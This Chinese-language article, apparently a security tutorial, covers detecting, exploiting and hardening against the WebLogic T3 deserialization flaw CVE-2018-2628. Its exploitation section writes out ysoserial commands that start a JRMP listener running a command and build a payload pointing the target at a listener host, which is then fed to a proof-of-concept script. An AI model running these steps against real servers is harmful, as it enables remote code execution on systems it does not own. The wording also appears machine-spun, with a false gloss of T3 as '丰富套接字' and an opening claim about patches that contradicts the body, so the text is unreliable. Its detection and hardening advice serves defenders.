cve2018 2628破绽检测

CVE-2018-2628 是 2018 年 Weblogic 的高危反序列化破绽，基于 T3 协议，可致未授权远程代码执行，打补丁后仍有利用方法，可通过关闭 T3 服务等加固。

CVE-2018-2628 破绽是 2018 年 Weblogic 被爆出的基于 T3（丰富套接字）协议的反序列化高危破绽，以下是关于该破绽检测的详细内容：

一、破绽描述

Weblogic Server 中的 RMI 通信使用 T3 协议在 Weblogic Server 和其它 Java 程序（客户端或者其它 Weblogic Server 实例）之间传输数据，服务器实例会跟踪连接到应用程序的每个 Java 虚拟机（JVM），并创建 T3 协议通信连接，将流量传输到 Java 虚拟机，T3 协议在开放 WebLogic 控制台端口的应用上默认开启，攻击者可以通过 T3 协议发送反面的反序列化数据，进行反序列化，实现对存在破绽的 weblogic 组件的远程代码执行攻击。

二、影响版本

Weblogic 10.3.6.0、Weblogic 12.1.3.0、Weblogic 12.2.1.2、Weblogic 12.2.1.3 等版本受此破绽影响。

三、检测方法

1、工具检测：可以使用 CVE-2018-2628-MultiThreading.py 等专门的检测工具，将目标主机的 IP 和端口填入 url.txt 文件中，然后在命令行运行该检测工具，若结果显示 “is vul CVE-2018-2628”，则说明破绽存在。

2、Nmap 扫描辅助判断：使用 nmap 对目标主机进行端口扫描，针对 7001、7002 等默认的控制端口进行扫描，并加上 weblogic-t3-info 脚本，如果目标服务器开启了 T3 协议，会在扫描结果中显示，这可作为破绽可能存在的一个初步判断依据，但不能仅据此确定破绽存在，还需进一步用检测工具确认。

四、破绽利用原理

1、搭建实验环境：准备 JDK 版本为 jdk1.7.0_21、Weblogic 版本为 10.3.6.0 的 Ubuntu 主机和 Windows10 主机，Ubuntu 主机用于设置监听，Windows10 主机用于发起攻击。

2、开启端口监听：在 Ubuntu 主机上运行 ysoserial-0.1-cve-2018-2628-all.jar 中的 JRMPListener 工具开启端口监听，如 “java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener<listen port><gadget class><command>”，参考命令 “java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "calc.exe"”，Ubuntu 主机上的指定端口开启并处于监听状态。

3、生成 Payload：在 Ubuntu 主机上使用 ysoserial-0.1-cve-2018-2628-all.jar 工具生成一个 payload 字符串，格式为 “java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient2<JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $’

‘ && echo”。“java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.10.50:22801 | xxd -p | tr -d $’

‘ && echo”。

4、修改利用脚本：将生成的 Payload 字符串复制到 weblogic_poc.py 文件中替换 PAYLOAD，并将文件末尾的 dip 变量的值修改为目标服务器（Weblogic 所在服务器）的 IP 地址。

5、执行利用脚本：在 Windows10 主机上执行 weblogic_poc.py 开始破绽利用，若破绽利用成功，目标服务器上的 Weblogic 会远程调用 Ubuntu 主机上的方法，如打开计算器程序等。

五、破绽加固方法

1、打官方补丁：打上官方最新的补丁，以修复该破绽，官方发布的补丁已经补住了这个利用方法。

2、手动加固：可以进入 WebLogic 控制台，点击域进行域配置，在 base_domain 的配置页面中，进入“安全”选项卡页面，点击“筛选器”，进入连接筛选器配置，添加过滤器，输入 “weblogic.security.net.ConnectionFilterImpl”，在连接筛选器规则中输入 “ip * * allow t3（ip 为允许的 IP）0.0.0.0/0 * * deny t3 t3s”，配置成功后保存即可，这样可以通过过滤掉 T3 协议或限制特定 IP 访问来防止破绽被利用。

六、相关问答FAQs

1、问：CVE-2018-2628破绽是否必须通过特定的工具才能检测出来？

答：虽然有专门针对该破绽的检测工具如 CVE-2018-2628-MultiThreading.py 等可以较为准确地检测出破绽是否存在，但也可以通过一些其他方式辅助判断，如使用 nmap 进行端口扫描并结合 weblogic-t3-info 脚本查看目标服务器是否开启了 T3 协议，不过这些方法只能作为初步判断，最终确定破绽是否存在仍需使用专门的检测工具。

2、问：打了官方补丁后是否就一定不会受到 CVE-2018-2628破绽的影响？

答：打上官方补丁是目前修复该破绽的主要和有效方法之一，官方发布的补丁已经针对该破绽的利用方法进行了修补，但如果在打补丁后系统又出现了新的安全问题或配置不当等情况，仍有可能受到其他潜在风险的威胁，除了及时打补丁外，还需要加强系统的整体安全防护和监控。

七、小编有话说

CVE-2018-2628破绽是一个严重的安全破绽，其利用了 T3 协议的反序列化特性来实现远程代码执行攻击，对于使用 Weblogic 应及时关注官方的安全公告，尽快采取相应的措施进行破绽检测和修复，如打补丁或进行手动加固等，以确保系统的安全性和稳定性，网络安全是一个持续的过程，需要不断关注和更新安全策略，以应对不断变化的安全威胁。